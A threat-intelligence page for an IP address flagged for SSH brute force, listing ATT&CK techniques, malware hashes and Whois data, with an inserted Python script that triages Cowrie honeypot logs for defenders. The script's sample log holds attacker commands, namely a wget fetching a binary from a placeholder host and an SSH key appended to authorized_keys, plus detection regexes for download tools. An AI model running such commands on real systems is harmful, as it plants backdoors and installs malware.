119.28.81.30 Threat Intelligence and Host Information

General

This page contains threat intelligence for the IPv4 address 119.28.81.30. It was generated either because malicious activity was observed from the address or as an information-gathering exercise to enrich security events with context. All information is gathered passively, by aggregating public sources or by observing activity against honeynets. The host score is calculated from a series of statistically weighted values and machine learning models that take into account metadata such as host information; the frequency, volume and global distribution of malicious activity; association with other known malicious hosts or networks; proxying or anonymising behaviour such as Tor exit nodes, residential proxies or VPN services; and many other attributes. These values are historical and indicative only, and should not be taken as an accurate representation of the users, businesses or networks in which the address resides.

Likely Malicious Host 🟠 60/100

Host and Network Information

  • MITRE ATT&CK IDs: T1078 - Valid Accounts, T1083 - File and Directory Discovery, T1098.004 - SSH Authorized Keys, T1105 - Ingress Tool Transfer, T1110.004 - Credential Stuffing, T1110 - Brute Force
  • Tags: Bruteforce, cowrie, cyber security, digital ocean, ioc, malicious, Nextray, phishing, scanners, ssh, tsec

  • View other sources: Spamhaus, VirusTotal

  • Country: Hong Kong
  • Network: AS132203 Tencent Building, Kejizhongyi Avenue
  • Noticed: 34 times
  • Protocols Attacked: ssh
  • Countries Attacked: Canada, Czechia, Denmark, Estonia, France, Germany, Latvia, Lithuania, Norway, Poland, Romania, Turkey, Ukraine, United Kingdom of Great Britain and Northern Ireland, United States of America

Malware Detected on Host

Count: 18 (10 SHA-256 hashes listed)

  • c0bf43b660fb91f4bec9c459ff0f4b1a7c999613be53ccc151d363e0c882f017
  • d1b3709be43be86ad8c7ba20b816ffa27dbebccaa14f4062e7b57124839865e6
  • 0581c0dcd7afe56f26f705d1692a7188a0be70311122c19a77dd1ae5906e0c45
  • 314b6b947e3cc210a8d5a82e59f873150ca12855877654c2b42a5b0c9561c951
  • 9ce5462e127bf97dbe1f81dd044bb36b01725731ffa56a6b6b64c399b3d88773
  • 9f6671fc8b1512d98dba37837a901fc1684bbc18f71e358b72e40b36d8c65d7f
  • 699837110d20c0a927fba2ac970a66634875316d54499da3cc8b08a4cd8f7314
  • 72de47d2af8ec94b67735ed57f3507c4d6bdba9bb1392f8491d6e00feec4703c
  • 11e2ba3e18fb8986e734d87ee60d1c353896d29470d36d812597a9c98f5e7f83
  • b280accf0a2d19e1a272bc2b08e00cd0c8a40a18fe80f178d02c7c55aae3adb8
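The ATT&CK IDs and the Cowrie tag above describe what the honeynet saw from this address: SSH brute force, a successful login, discovery commands, an authorized_keys write and a tool download. The following script is an added example, not code from this page's data feed, showing how to triage Cowrie JSON logs into those same technique IDs and to match downloaded files against the SHA-256 list above. It assumes Cowrie's standard JSON event schema (eventid, src_ip, input, shasum), an assumed brute-force threshold of five failed logins, and a constructed sample log in which this page's IP plays the attacker; the 203.0.113.5 and 198.51.100.7 addresses are documentation ranges, not observed hosts.

```python
"""Cowrie honeypot log triage against the ATT&CK techniques and SHA-256 IOCs
listed on this page. Added example, not code from the page's data feed.
Assumptions: Cowrie's standard JSON event schema (eventid, src_ip, input,
shasum); the brute-force threshold; and the constructed sample log below."""
import json
import re

# Two of the SHA-256 hashes from this page's "Malware Detected on Host" list.
IOC_HASHES = {
    "c0bf43b660fb91f4bec9c459ff0f4b1a7c999613be53ccc151d363e0c882f017",
    "d1b3709be43be86ad8c7ba20b816ffa27dbebccaa14f4062e7b57124839865e6",
}

# Assumed threshold: failed logins per source IP before we call it T1110.
BRUTE_FORCE_THRESHOLD = 5

# Tool-transfer and discovery commands as typed into the honeypot shell.
DOWNLOAD_RE = re.compile(r"(?:^|[\s;&|])(?:wget|curl|tftp|ftpget)\b")
DISCOVERY_RE = re.compile(r"(?:^|[\s;&|])(?:ls|find|locate)\b|cat\s+/etc/passwd")

# Constructed sample log (not real capture data); 203.0.113.5 and 198.51.100.7
# are documentation addresses. The page's IP is used as the attacking source.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"119.28.81.30","username":"root","password":"123456","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"119.28.81.30","username":"root","password":"admin","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"119.28.81.30","username":"admin","password":"admin","session":"a2"}
{"eventid":"cowrie.login.failed","src_ip":"119.28.81.30","username":"ubuntu","password":"ubuntu","session":"a3"}
{"eventid":"cowrie.login.failed","src_ip":"119.28.81.30","username":"pi","password":"raspberry","session":"a4"}
{"eventid":"cowrie.login.success","src_ip":"119.28.81.30","username":"root","password":"toor","session":"a5"}
{"eventid":"cowrie.command.input","src_ip":"119.28.81.30","input":"cd ~ && ls -la /root /etc","session":"a5"}
{"eventid":"cowrie.command.input","src_ip":"119.28.81.30","input":"mkdir -p ~/.ssh && echo 'ssh-ed25519 AAAAC3example attacker' >> ~/.ssh/authorized_keys","session":"a5"}
{"eventid":"cowrie.command.input","src_ip":"119.28.81.30","input":"wget http://203.0.113.5/x86 -O /tmp/x86","session":"a5"}
{"eventid":"cowrie.session.file_download","src_ip":"119.28.81.30","url":"http://203.0.113.5/x86","shasum":"c0bf43b660fb91f4bec9c459ff0f4b1a7c999613be53ccc151d363e0c882f017","session":"a5"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"root","password":"root","session":"b1"}
"""


def parse_events(text):
    """One JSON object per line, as Cowrie's JSON output plugin writes them."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def triage(events, threshold=BRUTE_FORCE_THRESHOLD):
    """Map each source IP to failed-login count, ATT&CK technique IDs and IOC hits."""
    report = {}

    def entry(ip):
        return report.setdefault(
            ip, {"failed_logins": 0, "techniques": set(), "ioc_hashes": set()})

    for ev in events:
        rec = entry(ev.get("src_ip", "unknown"))
        eid = ev.get("eventid")
        if eid == "cowrie.login.failed":
            rec["failed_logins"] += 1
            # Volume alone cannot separate password guessing (T1110.001) from
            # credential stuffing (T1110.004), so report the parent technique.
            if rec["failed_logins"] >= threshold:
                rec["techniques"].add("T1110")
        elif eid == "cowrie.login.success":
            rec["techniques"].add("T1078")          # Valid Accounts
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            if "authorized_keys" in cmd:
                rec["techniques"].add("T1098.004")  # SSH Authorized Keys
            if DOWNLOAD_RE.search(cmd):
                rec["techniques"].add("T1105")      # Ingress Tool Transfer
            if DISCOVERY_RE.search(cmd):
                rec["techniques"].add("T1083")      # File and Directory Discovery
        elif eid == "cowrie.session.file_download":
            rec["techniques"].add("T1105")
            if ev.get("shasum") in IOC_HASHES:
                rec["ioc_hashes"].add(ev["shasum"])

    return {ip: {"failed_logins": r["failed_logins"],
                 "techniques": sorted(r["techniques"]),
                 "ioc_hashes": sorted(r["ioc_hashes"])}
            for ip, r in report.items()}


if __name__ == "__main__":
    for ip, r in triage(parse_events(SAMPLE_LOG)).items():
        print(ip, r)
```

To run this over a real sensor, replace SAMPLE_LOG with the contents of Cowrie's cowrie.json and tune BRUTE_FORCE_THRESHOLD to the sensor's normal background of failed logins; a single IOC hash hit is a stronger signal than any login count, since the page's score is indicative only and a hash match ties the source directly to a known sample.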

Whois Information

  • inetnum: 119.28.0.0 - 119.29.255.255
  • netname: TencentCloud
  • descr: Tencent cloud computing (Beijing) Co., Ltd.
  • descr: Floor 6, Yinke Building, 38 Haidian St,
  • descr: Haidian District Beijing
  • country: HK
  • admin-c: JT1125-AP
  • tech-c: JX1747-AP
  • abuse-c: AC1601-AP
  • status: ALLOCATED PORTABLE
  • mnt-by: MAINT-CNNIC-AP
  • mnt-irt: IRT-TENCENTCLOUD-CN
  • mnt-routes: MAINT-TENCENT-NET-AP-CN
  • last-modified: 2023-11-28T00:56:59Z

  • irt: IRT-TencentCloud-CN
  • address: 9F, FIYTA Building, Gaoxinnanyi Road, Southern
  • address: District of Hi-tech Park, Shenzhen
  • e-mail: [email protected]
  • abuse-mailbox: [email protected]
  • admin-c: JT1125-AP
  • tech-c: JX1747-AP
  • mnt-by: MAINT-CNNIC-AP
  • last-modified: 2023-03-16T07:10:54Z

  • role: ABUSE CNNICCN
  • address: Beijing, China
  • country: ZZ
  • phone: +000000000
  • e-mail: [email protected]
  • admin-c: IP50-AP
  • tech-c: IP50-AP
  • nic-hdl: AC1601-AP
  • abuse-mailbox: [email protected]
  • mnt-by: APNIC-ABUSE
  • last-modified: 2020-05-14T11:19:01Z

  • person: James Tian
  • address: 9F, FIYTA Building, Gaoxinnanyi Road, Southern
  • address: District of Hi-tech Park, Shenzhen
  • country: CN
  • phone: +86-755-86013388-84952
  • e-mail: [email protected]
  • nic-hdl: JT1125-AP
  • mnt-by: MAINT-CNNIC-AP
  • last-modified: 2021-09-17T00:37:15Z

  • person: Jimmy Xiao
  • address: 9F, FIYTA Building, Gaoxinnanyi Road, Southern
  • address: District of Hi-tech Park, Shenzhen
  • country: CN
  • phone: +86-755-86013388-80224
  • e-mail: [email protected]
  • nic-hdl: JX1747-AP
  • mnt-by: MAINT-CNNIC-AP
  • last-modified: 2021-09-17T00:38:09Z

  • route: 119.28.64.0/19
  • descr: ComsenzNet routes
  • origin: AS133478
  • mnt-by: MAINT-COMSENZ1-CN
  • last-modified: 2015-12-14T12:36:14Z

Links to attack logs

  • bruteforce-ip-list-2022-07-20
  • dofrank-ssh-bruteforce-ip-list-2022-07-17